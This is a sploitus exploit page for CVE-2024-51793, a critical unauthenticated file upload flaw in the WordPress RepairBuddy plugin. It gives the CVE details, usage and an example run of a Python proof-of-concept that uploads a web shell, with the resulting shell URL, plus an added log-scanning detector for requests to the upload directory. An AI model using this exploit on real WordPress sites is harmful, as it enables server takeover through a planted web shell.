## https://sploitus.com/exploit?id=11687EAC-8083-54F4-B50D-4B348035BFCD
# WordPress RepairBuddy Plugin Exploit
## CVE Information
**CVE-ID:** CVE-2024-51793
**Published:** 2024-11-11
**Updated:** 2024-11-11
**Title:** WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability
**Description:**
Unrestricted Upload of File with Dangerous Type vulnerability in Webful Creations Computer Repair Shop allows Upload a Web Shell to a Web Server. This issue affects Computer Repair Shop: from n/a through 3.8115.
**CWE:**
- [CWE-434: Unrestricted Upload of File with Dangerous Type](https://cwe.mitre.org/data/definitions/434.html)
**CVSS:**
- **Score:** 10.0 (CRITICAL)
- **Version:** 3.1
- **Vector String:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
## Description
This is a proof of concept exploit for the Arbitrary File Upload vulnerability in the WordPress RepairBuddy plugin versions <= 3.8115. The exploit allows an attacker to upload a web shell to the vulnerable server.
## Requirements
- Python 3.x
- `requests` library (`pip install requests`)
## Usage
```shell
usage: CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload
```
## Example
```shell
python CVE-2024-51793.py -u http://target.com/wordpress
```
## Output
```text
Exploit By : Nxploit Khaled Alenazi,
The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><img src=\"http:\/\/target\/wordpress\/wp-content\/plugins\/computer-repair-shop\/assets\/images\/attachment.png\" class=\"\" \/><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
Shell uploaded successfully.
Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php
```
```
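The output above shows uploaded files landing under `wp-content/repairbuddy_uploads/`, so any request for a script file in that directory is a strong indicator of compromise. The following detection sketch is an added example, not part of the original PoC or the plugin; it assumes combined-format access logs, and the function names, extension list and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory taken from the PoC output on this page.
UPLOAD_DIR = "/wp-content/repairbuddy_uploads/"
# Extensions PHP handlers commonly execute (assumption; match your server config).
SCRIPT_EXT = re.compile(r"^(php\d?|phtml|phar|pht)$", re.IGNORECASE)
# Combined log format (assumption about the web server's log layout).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def is_script_in_uploads(target):
    """True if the request target names a script file under the plugin upload dir."""
    path = unquote(urlsplit(target).path)  # drop the query string, then decode %xx
    if UPLOAD_DIR not in path.lower():
        return False
    filename = path.rsplit("/", 1)[-1]
    # Check every dot-separated suffix so "x.php.jpg" is flagged as well.
    return any(SCRIPT_EXT.match(part) for part in filename.split(".")[1:])

def find_suspicious_requests(lines):
    """Return (ip, timestamp, method, target, status) for each matching log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_script_in_uploads(m["target"]):
            hits.append((m["ip"], m["ts"], m["method"], m["target"], int(m["status"])))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Mar/2025:22:43:51 +0000] "GET /wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php HTTP/1.1" 200 12 "-" "python-requests/2.31"',
    '198.51.100.4 - - [23/Mar/2025:22:50:02 +0000] "GET /wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_20_10_00_00invoice.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Mar/2025:22:51:10 +0000] "POST /wordpress/wp-content/repairbuddy_uploads/reciepts/a%2Ephp?x=1 HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.9 - - [23/Mar/2025:23:00:00 +0000] "GET /wordpress/wp-login.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit with a 200 status means the file was served and warrants checking the directory on disk; a 404 still records a probe worth correlating by source address.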
## Author
Exploit By: Nxploited, Khaled Alenazi